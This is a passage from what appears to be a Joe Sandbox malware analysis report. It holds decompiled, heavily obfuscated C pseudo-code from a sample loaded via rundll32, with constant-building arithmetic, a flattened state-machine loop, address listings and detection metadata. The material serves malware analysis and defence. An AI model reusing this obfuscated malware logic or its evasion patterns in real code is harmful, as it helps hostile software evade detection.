                                                                                                                    				_v1736 = _v1736 + 0x884f;
                                                                                                                    				_v1736 = _v1736 ^ 0x83e17d26;
                                                                                                                    				_v1736 = _v1736 ^ 0x7950511a;
                                                                                                                    				_v1736 = _v1736 ^ 0xfaacae3a;
                                                                                                                    				_v1640 = 0x9a0364;
                                                                                                                    				_v1640 = _v1640 >> 4;
                                                                                                                    				_v1640 = _v1640 ^ 0x000747da;
                                                                                                                    				_v1700 = 0xbe1482;
                                                                                                                    				_v1700 = _v1700 ^ 0x7ff54444;
                                                                                                                    				_v1700 = _v1700 << 4;
                                                                                                                    				_v1700 = _v1700 + 0xffff3bda;
                                                                                                                    				_v1700 = _v1700 ^ 0xf4b38ed0;
                                                                                                                    				_v1708 = 0xf0c015;
                                                                                                                    				_v1708 = _v1708 >> 2;
                                                                                                                    				_v1708 = _v1708 * 0x59;
                                                                                                                    				_v1708 = _v1708 >> 0xd;
                                                                                                                    				_v1708 = _v1708 ^ 0x00007652;
                                                                                                                    				_v1628 = 0xfcf2a2;
                                                                                                                    				_v1628 = _v1628 + 0x310b;
                                                                                                                    				_v1628 = _v1628 ^ 0x00fb84b7;
                                                                                                                    				_v1716 = 0xcaf3e1;
                                                                                                                    				_v1716 = _v1716 ^ 0x58005d51;
                                                                                                                    				_v1716 = _v1716 / _t562;
                                                                                                                    				_v1716 = _v1716 << 0xb;
                                                                                                                    				_v1716 = _v1716 ^ 0x4f02f929;
                                                                                                                    				_v1688 = 0xa9bf16;
                                                                                                                    				_t563 = 0x35;
                                                                                                                    				_v1688 = _v1688 / _t563;
                                                                                                                    				_v1688 = _v1688 * 0x4f;
                                                                                                                    				_v1688 = _v1688 ^ 0x00ffa3e1;
                                                                                                                    				_v1692 = 0x1a52e4;
                                                                                                                    				_v1692 = _v1692 | 0xd338ade8;
                                                                                                                    				_v1692 = _v1692 + 0xffff9820;
                                                                                                                    				_v1692 = _v1692 ^ 0xd337a700;
                                                                                                                    				_v1652 = 0xe154f6;
                                                                                                                    				_v1652 = _v1652 ^ 0xa48feb80;
                                                                                                                    				_v1652 = _v1652 ^ 0xa466ad28;
                                                                                                                    				_v1676 = 0x84491a;
                                                                                                                    				_v1676 = _v1676 + 0x31b5;
                                                                                                                    				_v1676 = _v1676 + 0x8487;
                                                                                                                    				_v1676 = _v1676 ^ 0x0081059f;
                                                                                                                    				_v1604 = 0xb120c5;
                                                                                                                    				_t564 = 0x4b;
                                                                                                                    				_t552 = _v1596;
                                                                                                                    				_t567 = _v1596;
                                                                                                                    				_v1604 = _v1604 * 0x65;
                                                                                                                    				_v1604 = _v1604 ^ 0x45e4f2f6;
                                                                                                                    				_v1656 = 0x2a0a41;
                                                                                                                    				_v1656 = _v1656 << 0xc;
                                                                                                                    				_t498 = _v1596;
                                                                                                                    				_v1656 = _v1656 / _t564;
                                                                                                                    				_v1656 = _v1656 ^ 0x022e7e7e;
                                                                                                                    				_v1612 = 0x774513;
                                                                                                                    				_v1612 = _v1612 | 0x207416f8;
                                                                                                                    				_v1612 = _v1612 ^ 0x207b64ec;
                                                                                                                    				_v1620 = 0x205158;
                                                                                                                    				_v1620 = _v1620 << 0xd;
                                                                                                                    				_v1620 = _v1620 ^ 0x0a275bbe;
                                                                                                                    				while(1) {
                                                                                                                    					L1:
                                                                                                                    					while(1) {
                                                                                                                    						_t539 = 0x5c;
                                                                                                                    						do {
                                                                                                                    							while(1) {
                                                                                                                    								L3:
                                                                                                                    								_t572 = _t499 - 0xa8fcf9f;
                                                                                                                    								if(_t572 > 0) {
                                                                                                                    									break;
                                                                                                                    								}
                                                                                                                    								if(_t572 == 0) {
                                                                                                                    									E00348F9E(_v1688, _v1692, _v1652, _v1676, _t567);
                                                                                                                    									_t568 =  &(_t568[3]);
                                                                                                                    									goto L19;
                                                                                                                    								} else {
                                                                                                                    									if(_t499 == 0x4b40ba0) {
                                                                                                                    										_t553 =  *0x353e10; // 0x0
                                                                                                                    										_t554 = _t553 + 0x1c;
                                                                                                                    										while(1) {
                                                                                                                    											__eflags =  *_t554 - _t539;
                                                                                                                    											if( *_t554 == _t539) {
                                                                                                                    												break;
                                                                                                                    											}
                                                                                                                    											_t554 = _t554 + 2;
                                                                                                                    											__eflags = _t554;
                                                                                                                    										}
                                                                                                                    										_t552 = _t554 + 2;
                                                                                                                    										_t499 = 0x9c63280;
                                                                                                                    										continue;
                                                                                                                    									} else {
                                                                                                                    										if(_t499 == 0x7e93d80) {
                                                                                                                    											_t567 = E00331CEC(_v1740, _t552, _t499, _t499, _t552, _v1588, _t498, _v1748, _v1756, _v1764, _v1632, _v1704, _t499, _v1600, _v1668, _v1736, _t499, _v1720, _t499, _v1640,  &_v520);
                                                                                                                    											_t568 =  &(_t568[0x13]);
                                                                                                                    											__eflags = _t567;
                                                                                                                    											if(_t567 == 0) {
                                                                                                                    												L19:
                                                                                                                    												_t499 = 0xfa48365;
                                                                                                                    												_t539 = 0x5c;
                                                                                                                    												continue;
                                                                                                                    											} else {
                                                                                                                    												_t499 = 0xacc4ac0;
                                                                                                                    												_v1596 = 1;
                                                                                                                    												while(1) {
                                                                                                                    													_t539 = 0x5c;
                                                                                                                    													goto L3;
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										} else {
                                                                                                                    											if(_t499 == 0x9b91574) {
                                                                                                                    												_push(_v1624);
                                                                                                                    												_push(_v1684);
                                                                                                                    												_push(_v1712);
                                                                                                                    												_push( &_v1560);
                                                                                                                    												E003446BB(_v1744, _v1584);
                                                                                                                    												_t568 = _t568 - 0xc + 0x1c;
                                                                                                                    												_t499 = 0xf66352a;
                                                                                                                    												while(1) {
                                                                                                                    													_t539 = 0x5c;
                                                                                                                    													goto L3;
                                                                                                                    												}
                                                                                                                    											} else {
                                                                                                                    												if(_t499 != 0x9c63280) {
                                                                                                                    													goto L27;
                                                                                                                    												} else {
                                                                                                                    													_t496 = E0033912C(_v1752, _v1728, _t499, _v1660, _t499, _v1672, _v1760);
                                                                                                                    													_t498 = _t496;
                                                                                                                    													_t568 =  &(_t568[5]);
                                                                                                                    													if(_t496 != 0) {
                                                                                                                    														_t499 = 0x7e93d80;
                                                                                                                    														while(1) {
                                                                                                                    															_t539 = 0x5c;
                                                                                                                    															goto L3;
                                                                                                                    														}
                                                                                                                    													}
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								L24:
                                                                                                                    								return _v1596;
                                                                                                                    							}
                                                                                                                    							__eflags = _t499 - 0xacc4ac0;
                                                                                                                    							if(_t499 == 0xacc4ac0) {
                                                                                                                    								E0033D6D8(_t567, _v1708, _t498, _v1628, _v1716);
                                                                                                                    								_t568 =  &(_t568[4]);
                                                                                                                    								_t499 = 0xa8fcf9f;
                                                                                                                    								_t539 = 0x5c;
                                                                                                                    								goto L27;
                                                                                                                    							} else {
                                                                                                                    								__eflags = _t499 - 0xf66352a;
                                                                                                                    								if(__eflags == 0) {
                                                                                                                    									_push(_v1592);
                                                                                                                    									_push(_v1732);
                                                                                                                    									_t481 = E0034DCF7(_v1616, 0x331020, __eflags);
                                                                                                                    									E0034176B( &_v1040, __eflags);
                                                                                                                    									_t503 =  *0x353e10; // 0x0
                                                                                                                    									_t431 = _t503 + 0x1c; // 0x1c
                                                                                                                    									_t432 = _t503 + 0x23c; // 0x23c
                                                                                                                    									E00341652(_v1644, __eflags, _t432, _t431, _v1648, _v1608, _t481, 0x104,  &_v520, _v1680,  &_v1560, _v1724,  &_v1040, _v1580);
                                                                                                                    									E0033A8B0(_v1636, _t481, _v1664);
                                                                                                                    									_t568 =  &(_t568[0xf]);
                                                                                                                    									_t499 = 0x4b40ba0;
                                                                                                                    									goto L1;
                                                                                                                    								} else {
                                                                                                                    									__eflags = _t499 - 0xfa48365;
                                                                                                                    									if(_t499 != 0xfa48365) {
                                                                                                                    										goto L27;
                                                                                                                    									} else {
                                                                                                                    										E00348F9E(_v1604, _v1656, _v1612, _v1620, _t498);
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							goto L24;
                                                                                                                    							L27:
                                                                                                                    							__eflags = _t499 - 0xd334e0e;
                                                                                                                    						} while (_t499 != 0xd334e0e);
                                                                                                                    						goto L24;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    			}
                                                                                                                    0x00345ef5
                                                                                                                    0x00345efb
                                                                                                                    0x00345f03
                                                                                                                    0x00345f0b
                                                                                                                    0x00345f16
                                                                                                                    0x00345f21
                                                                                                                    0x00345f2c
                                                                                                                    0x00345f37
                                                                                                                    0x00345f42
                                                                                                                    0x00345f4d
                                                                                                                    0x00345f60
                                                                                                                    0x00345f63
                                                                                                                    0x00345f66
                                                                                                                    0x00345f6d
                                                                                                                    0x00345f78
                                                                                                                    0x00345f80
                                                                                                                    0x00345f88
                                                                                                                    0x00345f90
                                                                                                                    0x00345f98
                                                                                                                    0x00345fa0
                                                                                                                    0x00345fa8
                                                                                                                    0x00345fb0
                                                                                                                    0x00345fb8
                                                                                                                    0x00345fc0
                                                                                                                    0x00345fcb
                                                                                                                    0x00345fd6
                                                                                                                    0x00345fe1
                                                                                                                    0x00345fec
                                                                                                                    0x00345ff7
                                                                                                                    0x00346002
                                                                                                                    0x00346012
                                                                                                                    0x00346016
                                                                                                                    0x0034601e
                                                                                                                    0x00346026
                                                                                                                    0x0034602e
                                                                                                                    0x00346033
                                                                                                                    0x00346040
                                                                                                                    0x00346044
                                                                                                                    0x0034604c
                                                                                                                    0x00346058
                                                                                                                    0x0034605b
                                                                                                                    0x0034605f
                                                                                                                    0x00346067
                                                                                                                    0x0034606f
                                                                                                                    0x00346077
                                                                                                                    0x0034607f
                                                                                                                    0x00346084
                                                                                                                    0x0034608e
                                                                                                                    0x00346096
                                                                                                                    0x0034609c
                                                                                                                    0x003460a1
                                                                                                                    0x003460a5
                                                                                                                    0x003460ad
                                                                                                                    0x003460b5
                                                                                                                    0x003460bd
                                                                                                                    0x003460cd
                                                                                                                    0x003460d3
                                                                                                                    0x003460db
                                                                                                                    0x003460e0
                                                                                                                    0x003460e8
                                                                                                                    0x003460fb
                                                                                                                    0x003460fe
                                                                                                                    0x00346105
                                                                                                                    0x00346110
                                                                                                                    0x00346118
                                                                                                                    0x00346120
                                                                                                                    0x00346128
                                                                                                                    0x00346130
                                                                                                                    0x00346138
                                                                                                                    0x00346140
                                                                                                                    0x00346145
                                                                                                                    0x0034614d
                                                                                                                    0x00346155
                                                                                                                    0x0034615d
                                                                                                                    0x0034616a
                                                                                                                    0x0034616e
                                                                                                                    0x00346176
                                                                                                                    0x0034617e
                                                                                                                    0x00346186
                                                                                                                    0x00346191
                                                                                                                    0x0034619c
                                                                                                                    0x003461a7
                                                                                                                    0x003461af
                                                                                                                    0x003461b7
                                                                                                                    0x003461bf
                                                                                                                    0x003461c7
                                                                                                                    0x003461cf
                                                                                                                    0x003461da
                                                                                                                    0x003461e2
                                                                                                                    0x003461ed
                                                                                                                    0x003461f5
                                                                                                                    0x003461fd
                                                                                                                    0x00346202
                                                                                                                    0x0034620a
                                                                                                                    0x00346212
                                                                                                                    0x0034621a
                                                                                                                    0x00346224
                                                                                                                    0x00346228
                                                                                                                    0x0034622d
                                                                                                                    0x00346235
                                                                                                                    0x00346240
                                                                                                                    0x0034624b
                                                                                                                    0x00346256
                                                                                                                    0x0034625e
                                                                                                                    0x0034626e
                                                                                                                    0x00346272
                                                                                                                    0x00346277
                                                                                                                    0x0034627f
                                                                                                                    0x0034628b
                                                                                                                    0x0034628e
                                                                                                                    0x00346297
                                                                                                                    0x0034629b
                                                                                                                    0x003462a3
                                                                                                                    0x003462ab
                                                                                                                    0x003462b5
                                                                                                                    0x003462bd
                                                                                                                    0x003462c5
                                                                                                                    0x003462d0
                                                                                                                    0x003462db
                                                                                                                    0x003462e6
                                                                                                                    0x003462ee
                                                                                                                    0x003462f6
                                                                                                                    0x003462fe
                                                                                                                    0x00346306
                                                                                                                    0x0034631b
                                                                                                                    0x0034631c
                                                                                                                    0x00346323
                                                                                                                    0x0034632a
                                                                                                                    0x00346331
                                                                                                                    0x0034633c
                                                                                                                    0x00346344
                                                                                                                    0x0034634f
                                                                                                                    0x00346356
                                                                                                                    0x0034635a
                                                                                                                    0x00346362
                                                                                                                    0x0034636d
                                                                                                                    0x00346378
                                                                                                                    0x00346383
                                                                                                                    0x0034638e
                                                                                                                    0x00346396
                                                                                                                    0x003463a1
                                                                                                                    0x003463a1
                                                                                                                    0x003463a6
                                                                                                                    0x003463a8
                                                                                                                    0x003463a9
                                                                                                                    0x003463a9
                                                                                                                    0x003463a9
                                                                                                                    0x003463a9
                                                                                                                    0x003463ab
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003463b1
                                                                                                                    0x003464ef
                                                                                                                    0x003464f4
                                                                                                                    0x00000000
                                                                                                                    0x003463b7
                                                                                                                    0x003463bd
                                                                                                                    0x003464bb
                                                                                                                    0x003464c1
                                                                                                                    0x003464c9
                                                                                                                    0x003464c9
                                                                                                                    0x003464cc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003464c6
                                                                                                                    0x003464c6
                                                                                                                    0x003464c6
                                                                                                                    0x003464ce
                                                                                                                    0x003464d1
                                                                                                                    0x00000000
                                                                                                                    0x003463c3
                                                                                                                    0x003463c9
                                                                                                                    0x0034649d
                                                                                                                    0x0034649f
                                                                                                                    0x003464a2
                                                                                                                    0x003464a4
                                                                                                                    0x003464f7
                                                                                                                    0x003464f7
                                                                                                                    0x003463a8
                                                                                                                    0x00000000
                                                                                                                    0x003464a6
                                                                                                                    0x003464a6
                                                                                                                    0x003464ab
                                                                                                                    0x003463a6
                                                                                                                    0x003463a8
                                                                                                                    0x00000000
                                                                                                                    0x003463a8
                                                                                                                    0x003463a6
                                                                                                                    0x003463cb
                                                                                                                    0x003463d1
                                                                                                                    0x00346411
                                                                                                                    0x0034641f
                                                                                                                    0x00346423
                                                                                                                    0x00346435
                                                                                                                    0x00346436
                                                                                                                    0x0034643b
                                                                                                                    0x0034643e
                                                                                                                    0x003463a6
                                                                                                                    0x003463a8
                                                                                                                    0x00000000
                                                                                                                    0x003463a8
                                                                                                                    0x003463d3
                                                                                                                    0x003463d9
                                                                                                                    0x00000000
                                                                                                                    0x003463df
                                                                                                                    0x003463f8
                                                                                                                    0x003463fd
                                                                                                                    0x003463ff
                                                                                                                    0x00346404
                                                                                                                    0x0034640a
                                                                                                                    0x003463a6
                                                                                                                    0x003463a8
                                                                                                                    0x00000000
                                                                                                                    0x003463a8
                                                                                                                    0x003463a6
                                                                                                                    0x00346404
                                                                                                                    0x003463d9
                                                                                                                    0x003463d1
                                                                                                                    0x003463c9
                                                                                                                    0x003463bd
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $Ym$94$>>$A*$Cu$FjeY$P5$Q]$Rv$T`L5$XQ $d{ $H
                                                                                                                    • API String ID: 0-2231434368
                                                                                                                    • Opcode ID: fd3cdb6952d804708a984ec329b2e9c68769045601593e9f3f6e21878d29ac78
                                                                                                                    • Instruction ID: 32bb65b8d54a344f3becbea6b264999509828e5e3e66b9f91a851a77ae3da762
                                                                                                                    • Opcode Fuzzy Hash: fd3cdb6952d804708a984ec329b2e9c68769045601593e9f3f6e21878d29ac78
                                                                                                                    • Instruction Fuzzy Hash: 84224471508380DFD369CF25C58AA9BFBE2FBC5344F10891DE29A8A260D7B49849CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E00346DF8(void* __ecx) {
                                                                                                                    				char _v524;
                                                                                                                    				char _v1044;
                                                                                                                    				char _v1564;
                                                                                                                    				short _v1568;
                                                                                                                    				short _v1572;
                                                                                                                    				intOrPtr _v1576;
                                                                                                                    				intOrPtr _v1580;
                                                                                                                    				intOrPtr _v1592;
                                                                                                                    				char _v1596;
                                                                                                                    				char _v1600;
                                                                                                                    				signed int _v1604;
                                                                                                                    				signed int _v1608;
                                                                                                                    				signed int _v1612;
                                                                                                                    				signed int _v1616;
                                                                                                                    				signed int _v1620;
                                                                                                                    				signed int _v1624;
                                                                                                                    				signed int _v1628;
                                                                                                                    				signed int _v1632;
                                                                                                                    				signed int _v1636;
                                                                                                                    				signed int _v1640;
                                                                                                                    				signed int _v1644;
                                                                                                                    				signed int _v1648;
                                                                                                                    				signed int _v1652;
                                                                                                                    				signed int _v1656;
                                                                                                                    				signed int _v1660;
                                                                                                                    				signed int _v1664;
                                                                                                                    				signed int _v1668;
                                                                                                                    				signed int _v1672;
                                                                                                                    				signed int _v1676;
                                                                                                                    				signed int _v1680;
                                                                                                                    				signed int _v1684;
                                                                                                                    				signed int _v1688;
                                                                                                                    				signed int _v1692;
                                                                                                                    				signed int _v1696;
                                                                                                                    				signed int _v1700;
                                                                                                                    				signed int _v1704;
                                                                                                                    				signed int _v1708;
                                                                                                                    				signed int _v1712;
                                                                                                                    				signed int _v1716;
                                                                                                                    				signed int _v1720;
                                                                                                                    				signed int _v1724;
                                                                                                                    				signed int _v1728;
                                                                                                                    				signed int _v1732;
                                                                                                                    				signed int _v1736;
                                                                                                                    				signed int _v1740;
                                                                                                                    				signed int _v1744;
                                                                                                                    				signed int _v1748;
                                                                                                                    				signed int _v1752;
                                                                                                                    				signed int _v1756;
                                                                                                                    				signed int _v1760;
                                                                                                                    				signed int _v1764;
                                                                                                                    				signed int _v1768;
                                                                                                                    				signed int _v1772;
                                                                                                                    				signed int _v1776;
                                                                                                                    				signed int _v1780;
                                                                                                                    				signed int _v1784;
                                                                                                                    				signed int _v1788;
                                                                                                                    				signed int _v1792;
                                                                                                                    				signed int _v1796;
                                                                                                                    				signed int _v1800;
                                                                                                                    				signed int _v1804;
                                                                                                                    				signed int _v1808;
                                                                                                                    				signed int _v1812;
                                                                                                                    				signed int _v1816;
                                                                                                                    				signed int _v1820;
                                                                                                                    				signed int _v1824;
                                                                                                                    				signed int _v1828;
                                                                                                                    				signed int _v1832;
                                                                                                                    				signed int _v1836;
                                                                                                                    				signed int _v1840;
                                                                                                                    				signed int _v1844;
                                                                                                                    				void* _t583;
                                                                                                                    				void* _t585;
                                                                                                                    				void* _t592;
                                                                                                                    				void* _t603;
                                                                                                                    				void* _t606;
                                                                                                                    				void* _t609;
                                                                                                                    				signed int _t611;
                                                                                                                    				signed int _t612;
                                                                                                                    				signed int _t613;
                                                                                                                    				signed int _t614;
                                                                                                                    				signed int _t615;
                                                                                                                    				signed int _t616;
                                                                                                                    				signed int _t617;
                                                                                                                    				signed int _t618;
                                                                                                                    				signed int _t619;
                                                                                                                    				void* _t620;
                                                                                                                    				signed int _t674;
                                                                                                                    				char _t675;
                                                                                                                    				void* _t677;
                                                                                                                    				signed int* _t682;
                                                                                                                    
                                                                                                                    				_t682 =  &_v1844;
                                                                                                                    				_v1580 = 0x812dcc;
                                                                                                                    				_v1600 = 0;
                                                                                                                    				_v1572 = 0;
                                                                                                                    				_v1568 = 0;
                                                                                                                    				_v1576 = 0x4b1be1;
                                                                                                                    				_v1604 = 0xb0e9fc;
                                                                                                                    				_v1604 = _v1604 >> 0xe;
                                                                                                                    				_v1604 = _v1604 ^ 0x020002c3;
                                                                                                                    				_v1816 = 0x316963;
                                                                                                                    				_v1816 = _v1816 ^ 0x05c37e76;
                                                                                                                    				_v1816 = _v1816 * 0x44;
                                                                                                                    				_t609 = __ecx;
                                                                                                                    				_v1816 = _v1816 << 6;
                                                                                                                    				_t677 = 0xb42e112;
                                                                                                                    				_v1816 = _v1816 ^ 0x13878f70;
                                                                                                                    				_v1648 = 0xe65aa1;
                                                                                                                    				_v1648 = _v1648 + 0xffffb7c7;
                                                                                                                    				_v1648 = _v1648 ^ 0x00e866e0;
                                                                                                                    				_v1608 = 0x4e6d43;
                                                                                                                    				_v1608 = _v1608 << 3;
                                                                                                                    				_v1608 = _v1608 ^ 0x027e4d7c;
                                                                                                                    				_v1792 = 0x62c447;
                                                                                                                    				_v1792 = _v1792 + 0xfffff9b0;
                                                                                                                    				_v1792 = _v1792 + 0xffff1ab6;
                                                                                                                    				_v1792 = _v1792 ^ 0x5826ec20;
                                                                                                                    				_v1792 = _v1792 ^ 0x58465e47;
                                                                                                                    				_v1616 = 0xd881ce;
                                                                                                                    				_t611 = 0x1c;
                                                                                                                    				_v1616 = _v1616 / _t611;
                                                                                                                    				_v1616 = _v1616 ^ 0x00049a8c;
                                                                                                                    				_v1784 = 0x225701;
                                                                                                                    				_v1784 = _v1784 ^ 0x455f73cc;
                                                                                                                    				_v1784 = _v1784 + 0x2d0b;
                                                                                                                    				_v1784 = _v1784 + 0xffff7069;
                                                                                                                    				_v1784 = _v1784 ^ 0x457ed570;
                                                                                                                    				_v1656 = 0xa0746c;
                                                                                                                    				_v1656 = _v1656 << 5;
                                                                                                                    				_v1656 = _v1656 ^ 0x1405cb88;
                                                                                                                    				_v1756 = 0x86f3a;
                                                                                                                    				_v1756 = _v1756 << 0xf;
                                                                                                                    				_v1756 = _v1756 + 0xffff9aa0;
                                                                                                                    				_v1756 = _v1756 ^ 0x379e88f8;
                                                                                                                    				_v1840 = 0x372205;
                                                                                                                    				_v1840 = _v1840 << 0xb;
                                                                                                                    				_v1840 = _v1840 >> 1;
                                                                                                                    				_t612 = 0x47;
                                                                                                                    				_v1840 = _v1840 * 0x27;
                                                                                                                    				_v1840 = _v1840 ^ 0x18b0e4c5;
                                                                                                                    				_v1720 = 0x55473e;
                                                                                                                    				_v1720 = _v1720 >> 0xe;
                                                                                                                    				_v1720 = _v1720 + 0xffff4222;
                                                                                                                    				_v1720 = _v1720 ^ 0xfff7d1f7;
                                                                                                                    				_v1760 = 0x8a22d4;
                                                                                                                    				_v1760 = _v1760 ^ 0x5338d916;
                                                                                                                    				_v1760 = _v1760 / _t612;
                                                                                                                    				_v1760 = _v1760 ^ 0x01221ec9;
                                                                                                                    				_v1716 = 0x7ad7ec;
                                                                                                                    				_v1716 = _v1716 ^ 0xb2734e10;
                                                                                                                    				_v1716 = _v1716 ^ 0xf628ba0e;
                                                                                                                    				_v1716 = _v1716 ^ 0x44287105;
                                                                                                                    				_v1624 = 0x6426f4;
                                                                                                                    				_v1624 = _v1624 * 0x29;
                                                                                                                    				_v1624 = _v1624 ^ 0x100ef306;
                                                                                                                    				_v1728 = 0x3e505e;
                                                                                                                    				_v1728 = _v1728 >> 8;
                                                                                                                    				_t613 = 0x3a;
                                                                                                                    				_v1728 = _v1728 / _t613;
                                                                                                                    				_v1728 = _v1728 ^ 0x00050efb;
                                                                                                                    				_v1752 = 0x3958e2;
                                                                                                                    				_v1752 = _v1752 ^ 0x62ae6d50;
                                                                                                                    				_v1752 = _v1752 ^ 0x97f7befb;
                                                                                                                    				_v1752 = _v1752 ^ 0xf561088c;
                                                                                                                    				_v1688 = 0xb21a91;
                                                                                                                    				_v1688 = _v1688 ^ 0x7ffc0397;
                                                                                                                    				_v1688 = _v1688 ^ 0x7f439e8f;
                                                                                                                    				_v1620 = 0xd8d2d1;
                                                                                                                    				_v1620 = _v1620 + 0x194e;
                                                                                                                    				_v1620 = _v1620 ^ 0x00d523c5;
                                                                                                                    				_v1696 = 0xa820cb;
                                                                                                                    				_v1696 = _v1696 + 0x8b3c;
                                                                                                                    				_v1696 = _v1696 ^ 0x00a28581;
                                                                                                                    				_v1680 = 0x121bc4;
                                                                                                                    				_t674 = 0x7a;
                                                                                                                    				_v1680 = _v1680 / _t674;
                                                                                                                    				_v1680 = _v1680 ^ 0x0006e996;
                                                                                                                    				_v1744 = 0x9924c6;
                                                                                                                    				_v1744 = _v1744 << 4;
                                                                                                                    				_t614 = 0x11;
                                                                                                                    				_v1744 = _v1744 * 0x36;
                                                                                                                    				_v1744 = _v1744 ^ 0x04d385a1;
                                                                                                                    				_v1632 = 0x653a8;
                                                                                                                    				_v1632 = _v1632 * 0x63;
                                                                                                                    				_v1632 = _v1632 ^ 0x027c9a7f;
                                                                                                                    				_v1672 = 0x158278;
                                                                                                                    				_v1672 = _v1672 + 0xffff088d;
                                                                                                                    				_v1672 = _v1672 ^ 0x001491ab;
                                                                                                                    				_v1832 = 0x486b88;
                                                                                                                    				_v1832 = _v1832 + 0xffff9f3d;
                                                                                                                    				_v1832 = _v1832 >> 3;
                                                                                                                    				_v1832 = _v1832 | 0x023d4c2b;
                                                                                                                    				_v1832 = _v1832 ^ 0x0230cd37;
                                                                                                                    				_v1612 = 0xd2c4ef;
                                                                                                                    				_v1612 = _v1612 * 0x5a;
                                                                                                                    				_v1612 = _v1612 ^ 0x4a177333;
                                                                                                                    				_v1776 = 0x829598;
                                                                                                                    				_v1776 = _v1776 << 0xe;
                                                                                                                    				_v1776 = _v1776 >> 2;
                                                                                                                    				_v1776 = _v1776 | 0x8c8c5501;
                                                                                                                    				_v1776 = _v1776 ^ 0xaddb19b6;
                                                                                                                    				_v1712 = 0x169d18;
                                                                                                                    				_v1712 = _v1712 / _t614;
                                                                                                                    				_v1712 = _v1712 >> 0xa;
                                                                                                                    				_v1712 = _v1712 ^ 0x000c26db;
                                                                                                                    				_v1704 = 0xb2b50;
                                                                                                                    				_v1704 = _v1704 ^ 0x2de07b8f;
                                                                                                                    				_v1704 = _v1704 ^ 0x2de0ad86;
                                                                                                                    				_v1800 = 0x9652d5;
                                                                                                                    				_t615 = 3;
                                                                                                                    				_v1800 = _v1800 * 0x68;
                                                                                                                    				_v1800 = _v1800 / _t615;
                                                                                                                    				_v1800 = _v1800 << 0xa;
                                                                                                                    				_v1800 = _v1800 ^ 0x6cd74e85;
                                                                                                                    				_v1664 = 0x74acab;
                                                                                                                    				_v1664 = _v1664 | 0xe18c4dd2;
                                                                                                                    				_v1664 = _v1664 ^ 0xe1f0b032;
                                                                                                                    				_v1824 = 0x58e83b;
                                                                                                                    				_t616 = 0x2c;
                                                                                                                    				_v1824 = _v1824 * 0x2b;
                                                                                                                    				_v1824 = _v1824 + 0xffff56af;
                                                                                                                    				_v1824 = _v1824 ^ 0x0c61ca29;
                                                                                                                    				_v1824 = _v1824 ^ 0x02809c1e;
                                                                                                                    				_v1764 = 0x974237;
                                                                                                                    				_v1764 = _v1764 << 0xb;
                                                                                                                    				_v1764 = _v1764 * 0x31;
                                                                                                                    				_v1764 = _v1764 ^ 0x9d674e65;
                                                                                                                    				_v1736 = 0xc3f98b;
                                                                                                                    				_v1736 = _v1736 * 0x5e;
                                                                                                                    				_v1736 = _v1736 | 0x641bd8e3;
                                                                                                                    				_v1736 = _v1736 ^ 0x67f85735;
                                                                                                                    				_v1700 = 0xe4f15c;
                                                                                                                    				_v1700 = _v1700 | 0xddaa88b0;
                                                                                                                    				_v1700 = _v1700 ^ 0xdde3c6d3;
                                                                                                                    				_v1844 = 0x9b3502;
                                                                                                                    				_v1844 = _v1844 ^ 0x47d60286;
                                                                                                                    				_v1844 = _v1844 / _t616;
                                                                                                                    				_v1844 = _v1844 ^ 0x0193d551;
                                                                                                                    				_v1640 = 0xffe1b1;
                                                                                                                    				_t617 = 0x39;
                                                                                                                    				_v1640 = _v1640 * 0x7b;
                                                                                                                    				_v1640 = _v1640 ^ 0x7af2e2c5;
                                                                                                                    				_v1808 = 0x2876e6;
                                                                                                                    				_v1808 = _v1808 | 0x109585e0;
                                                                                                                    				_v1808 = _v1808 << 0xd;
                                                                                                                    				_v1808 = _v1808 + 0x9cd3;
                                                                                                                    				_v1808 = _v1808 ^ 0xbefbba98;
                                                                                                                    				_v1676 = 0xd3b2e1;
                                                                                                                    				_v1676 = _v1676 << 0xf;
                                                                                                                    				_v1676 = _v1676 ^ 0xd9748eec;
                                                                                                                    				_v1836 = 0x3e007f;
                                                                                                                    				_v1836 = _v1836 + 0xffffe462;
                                                                                                                    				_v1836 = _v1836 >> 9;
                                                                                                                    				_v1836 = _v1836 >> 6;
                                                                                                                    				_v1836 = _v1836 ^ 0x000afa23;
                                                                                                                    				_v1684 = 0x2c402;
                                                                                                                    				_v1684 = _v1684 >> 0xa;
                                                                                                                    				_v1684 = _v1684 ^ 0x0000130c;
                                                                                                                    				_v1692 = 0x94252b;
                                                                                                                    				_v1692 = _v1692 / _t617;
                                                                                                                    				_v1692 = _v1692 ^ 0x000dcb04;
                                                                                                                    				_v1828 = 0xd5c7f6;
                                                                                                                    				_v1828 = _v1828 * 0x41;
                                                                                                                    				_v1828 = _v1828 + 0x5616;
                                                                                                                    				_v1828 = _v1828 >> 9;
                                                                                                                    				_v1828 = _v1828 ^ 0x001e39c7;
                                                                                                                    				_v1740 = 0xceff06;
                                                                                                                    				_v1740 = _v1740 << 0xe;
                                                                                                                    				_v1740 = _v1740 << 8;
                                                                                                                    				_v1740 = _v1740 ^ 0xc18fb5bb;
                                                                                                                    				_v1748 = 0x414330;
                                                                                                                    				_v1748 = _v1748 * 0x1d;
                                                                                                                    				_v1748 = _v1748 | 0x5a6f0d55;
                                                                                                                    				_v1748 = _v1748 ^ 0x5f6ea92a;
                                                                                                                    				_v1668 = 0xd2b255;
                                                                                                                    				_v1668 = _v1668 ^ 0xc5d7949e;
                                                                                                                    				_v1668 = _v1668 ^ 0xc50ba027;
